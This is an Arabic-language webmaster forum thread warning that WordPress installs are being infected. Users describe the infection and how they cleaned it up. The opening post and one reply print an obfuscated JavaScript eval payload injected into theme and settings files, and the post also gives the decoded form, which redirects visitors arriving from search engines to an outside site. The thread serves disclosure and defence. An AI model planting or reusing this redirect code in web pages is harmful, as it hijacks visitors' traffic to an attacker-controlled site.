احذر ان تكون الورد بريس مخترقة

[Crypted]

السلام عليكم و رحمة الله و بركاته

الاخوة الاعزاء .

اتمني من جميع من يملك ورد بريس علي سيرفره او يستخدمها ان يقوم بعمل بحث في ملفاتها عن الكود التالي

كود:

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))

حيث انتشر مؤخراً فيروس جديد عبارة عن زرع كود في الورد بريس يقوم بعمل تحويل الي موقع اخر .

و فك تشفير الكود هو

كود:

var r = document.referrer, t = "", q;
    if (r.indexOf("google.") != -1) {
        t = "q";
    }
    if (r.indexOf("msn.") != -1) {
        t = "q";
    }
    if (r.indexOf("yahoo.") != -1) {
        t = "p";
    }
    if (r.indexOf("altavista.") != -1) {
        t = "q";
    }
    if (r.indexOf("aol.") != -1) {
        t = "query";
    }
    if (r.indexOf("ask.") != -1) {
        t = "q";
    }
    if (t.length &&
        ((q = r.indexOf("?" + t + "=")) != -1 ||
        (q = r.indexOf("&" + t + "=")) != -1)) {
        window.location = "ht" + "tp" + ":/" + "/go" + "ogo" + "sea" + "rc" + "h." + "bi" + "z/s" + "ea" + "rc" + "h.p" + "hp?" + "t" + "y=1&t" + "er" + "ms=" + r.substring(q + 2 + t.length).split("&")[0];
    }

طبعاً الموقع الذي تم التحويل الية هو

http://googosearch.biz/search.php

الملفات المصابة هي :

function.php
wp-setting.php

طبعاً حسب ما فهمت من الكود انه التحويل يتم اذا كان الزائر اتي من احدي محركات البحث مثل قوقل او ام اس ان او ياهو و غيرها .

اتمني من الجميع الحذر

و اذا وجد احدكم موقعه مصاب . اتمني اذا استفاد من موضوعي اتمني منه دعوة في ظهر الغيب .


خالص الود

[منير حسن]

هل يمكن لذلك ان يكون في VB او سكربتات اخرى كالالعاب وغيرها ؟

[Mr.Mahdy]

فعلا اخى الكريم الكود دة منتشر من فترة وانا وجتة فى موقع عندى من فترة وتم السيطرة علية

شكرا على التوضيح

[خالد الحربي]

شكرا لك ابو حميد عالتحذير

طيب قوقل يعطيك تحذير شي هالويب ماستر؟

[Crypted]

شكرا لك ابو حميد عالتحذير

طيب قوقل يعطيك تحذير شي هالويب ماستر؟

هلا حبيبي خلوود .

لا خلود قوقل ويب ماستر ما ظهرلي فيه اي شئ .

و للاسف موقعي كان مخترق بهذا الكود لما يزيد عن 3 اسابيع كاملة . و ما كشفها لي الا الادسنس . لمن لاحظت انخفاض حاد جدا فاق النصف في دخل هذا الشهر قولت اكيد فيه شئ .

و بدأت اراجع كل شئ بالموقع .

من اول الكلمات في محركات البحث و مصادر الزوار .
القوقل اناليتكيس . و من هنا لاحظت انخفاض في وقت الزوار الخاصين بمحركات البحث .
و بدأت ادور في السورس حق موقعي لين كفشت هالكود مشفر عندي في كل مواقعي .

و الحمد لله حذفت . و حبيت اشارك الموضوع هنا لجل الكل ياخذ حذره .

خالص الود

[Abdulrahman Hassoun]

كود PHP:

<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script> 


وجدته في سورس كود أحد الورد بريسات على موقعي :s

بالرغم من أن مطور النسخة (مركب نسخة جاهزة) نبّه للفايروس وقمت بحذفه لكن يبدو انه رجع مرة أخرى :s

سأحذفه مجددًا وأشيك على باقي السكربتات

جزاك الله كل خير .. شكرًا جزيلًا لك على التنبيه!

[Abdulrahman Hassoun]

من يدلنا على طريقة بحيث نفحص كل ملفات السيرفر بشكل تلقائي؟

مثلًا نبحث عن عبارة

كود PHP:

eval(function(p,a,c,k,e,r) 


بشكل تلقائي في جميع ملفات السيرفر

هل توجد طريقة؟

[تركي العبدلي]

’’
الله يجزاك كل خير .. وناخوك

[Abdulrahman Hassoun]

دخلت على الواجهة الرسومية للسيرفر وعملت بحث من هناك بس بدون نتيجة

بالرغم من إني متأكد من وجود الكود في ملفات أخرى

[محمد بن سعود الفايز]

ازعجني هذا الكود قبل عدة أشهر.
سبب لي هبوط في الزوار من 17,000 لـ 2000 زائر

والسبب عبارة قوقل [ قد يضر هذا الموقع جهاز الكمبيوتر الخاص ]

[Damas]

الله يجزاك الخير على التنبيه لكن هل يوجد امر بالشل للبحث عن الكود الذي ذكرته ؟

اعتقد يوجد ولكن من سيتكرم علينا به ولا يبخل على اخوانه بهالموضوع

[خالد الحربي]

افضل حل لهالكود هو البحث يدوي من كمبيوتر نظيف

[Jobran]

سبق وحذرت من هذا الفيروس اول ما طلع هنا http://www.swalif.net/softs/swalif54/softs303421/

اضطريت احدث واغلق الثغرات 3 مرات لأنه عاود الرجوع اكثر من مره

خطوات التخلص منه بسيطه، اول شيء حدث السكربت، ثانيا ادخل على functions وامسح المدخلات الغريبه اخر السطور. ثالثا ارفع نسخه جديدة من جميع ملفات الوورد برس، او تقدر تشوف تواريخ تعديل الملفات وتحدث الملفات للي تم تعديلها مؤخرا لانها غالبا مصابه مع العلم انه مايصيب الكثير منها فقط في functions لانه يتكفل بالنشر

[خالد الحربي]

إضافات وورد بريس للتشييك على هالاكواد الخبيثة
http://wordpress.org/extend/plugins/tac/
و
http://wordpress.org/extend/plugins/exploit-scanner/

[ahdaf.net]

إضافات وورد بريس للتشييك على هالاكواد الخبيثة
http://wordpress.org/extend/plugins/tac/
و
http://wordpress.org/extend/plugins/exploit-scanner/

جازاكم الله خيرا
قتلتنى اكواد ال eval وكل يوم تنبيه من جوجل ويب ماستر

قمت باستعمال برنامج exploit-scanner للبحث عن الاكواد الضارة وحذفها
لكن ما الوسيلة لكى امنع تكرار حقن هذه الاكواد الخبيثة مرة اخرى